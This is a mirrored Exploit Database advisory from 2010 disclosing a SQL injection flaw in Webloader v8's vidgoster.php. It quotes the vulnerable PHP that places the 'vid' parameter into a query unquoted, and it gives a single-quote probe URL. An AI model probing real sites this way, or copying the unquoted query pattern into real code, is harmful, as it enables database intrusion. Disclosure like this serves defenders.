Webloader 8 – SQL Injection

• Exploit Database
• 20 阅读

• 作者： ByEge
  日期： 2010-05-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12731/

• [~] Title: Webloader v8 SQL Injection Vulnerability
  
  [~] Date: 16.05.2010
  
  [~] Script Home: www.webloader.org 
  
  [~] Author: ByEge
  
  [~] Homepage: byege.blogspot.com
  
  [~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]
  
  
  [~] vidgoster.php Bug code :
  
  [~] <?
  [~] include 'baglan.php';
  [~] $vid=temiz($_GET['vid']);
  
  [~] $c=solcek("select * from webvideo where id=$vid");
  [~] $va=solarray($c);
  
  [~] ?>
  
  
  [~] Example :
  
  [~] http://site.com/vidgoster.php?vid=1'
  
  
  [~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]
  
  [~] Th4nks : Fantastik, MitolocyA, ISYAN,